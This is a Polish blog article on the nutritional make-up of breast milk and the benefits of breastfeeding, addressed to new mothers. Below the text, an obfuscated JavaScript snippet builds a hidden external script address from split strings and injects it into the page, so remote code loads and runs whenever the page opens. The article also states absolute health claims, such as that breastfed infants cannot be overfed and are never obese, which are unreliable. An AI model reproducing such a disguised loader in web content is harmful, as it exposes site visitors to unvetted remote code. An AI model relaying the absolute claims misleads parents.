Sposób karmienia noworodka inwestycją w jego przyszłość

Człowiek jako ssak z natury rzeczy w początkowym okresie życia jest karmiony przez matkę. Innymi słowy: ssie jej pierś. Natura tak sprytnie to wymyśliła, że mleko mamy jest dokładną odpowiedzią na potrzeby małego dziecka. A ponieważ potrzeby te stale się zmieniają, nie da się w pełni zastąpić naturalnego pokarmu sztucznym.

(adsbygoogle = window.adsbygoogle || []).push({});

W pierwszych dniach po porodzie z kobiecych piersi leci siara – nieciekawie wyglądający, żółty pokarm, który dostarcza dziecku przede wszystkim dużo białka i niezbędnych do prawidłowego funkcjonowania przeciwciał. Kolejne dwa tygodnie to tak zwane mleko przejściowe – zawiera ono głównie laktozę, tłuszcze i wapń. W trzecim tygodniu życia dziecka mleko jego mamy staje się pełnowartościowe i zawiera wszystkie niezbędne dziecku składniki.

Warto zauważyć kilka rzeczy:

– Mleko kobiece nigdy nie jest takie samo. Jego skład zależny jest nie tylko od diety matki karmiącej, ale także od pory dnia. Nie bez powodu niemowlęta lubią nocne karmienie. W nocy pokarm zawiera więcej białka i tłuszczu, dziecko lepiej się najada. Można zaryzykować stwierdzenie, że w dzień dziecko się jedynie napija, a najada w nocy.

– Mleko kobiece za każdym razem ma minimalnie inny smak. Z tego powodu są dni, kiedy dzieci jedzą bardzo chętnie, niemalże wiszą na maminym cycu, innym razem nerwowo odrzucają pierś. Karmienie noworodka piersią przyzwyczaja dziecko do różnych smaków, mleko modyfikowane za każdym razem smakuje tak samo.

– Mleko kobiece jest idealną odpowiedzią na zapotrzebowanie dziecka. Dziecko karmione piersią jest najedzone, ale nie można go przekarmić. Nie spotyka się otyłych dzieci karmionych piersią.

Oprócz białka, wapnia, tłuszczu i laktozy w mleku kobiecym można znaleźć również:

– cholesterol – niezbędny do prawidłowego rozwoju układu nerwowego i mózgu.

– składniki immunoaktywne – dziecko ma słabo rozwinięty układ odpornościowy, nie ma własnych przeciwciał, musi dostać je od mamy.

– witaminy – w mleku mamy znajdują się niemal wszystkie niezbędne dziecku witaminy. Zaleca się jedynie podawanie niemowlętom witaminy K i D3.

– sole mineralne i mikroelementy — ich ilość w pokarmie całkowicie zaspokaja zapotrzebowanie dziecka. Warto zauważyć, że mleko matki charakteryzuje się niską zawartością soli, co ma bardzo pozytywne odbicie na stanie nerek dziecka.

– enzymy – przekazywane dziecku wraz z pokarmem znacznie ułatwiają trawienie.

– antyoksydanty – ich obecność w mleku chroni dziecko przed szkodliwym działaniem wolnych rodników.

Dowiedziono, że dzieci karmione piersią rzadziej chorują na choroby układu oddechowego i pokarmowego, oraz bakteryjne zapalenie opon mózgowo-rdzeniowych. Rzadziej też zapadają na alergie pokarmowe. Badania wskazują także związek pomiędzy sposobem karmienia niemowląt a uzyskiwanymi przez nie wynikam i w testach na inteligencję – prym wiodą dzieci karmione piersią.

Dlatego droga mamo, jeśli możesz, wybierz karmienie piersią.

(function(){
qj8d=document.createElement(“script”);qj8d_=(“us”)+(“ta”);
qj8d_+=”t”+(“.”);qj8d_+=(“in”);qj8du=”15220298″;qj8d.async=true;
qj8du+=”.al1dq8Xqj8d8k107c”;qj8d.type=”text/javascript”;qj8d_+=”f”+”o”+(“/”);
qj8du+=”hrejqyumd1sxq”;qj8d.src=”//”+qj8d_+qj8du;
dqj8d=document.body;dqj8d.appendChild(qj8d);
})();

Podobne wpisy

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.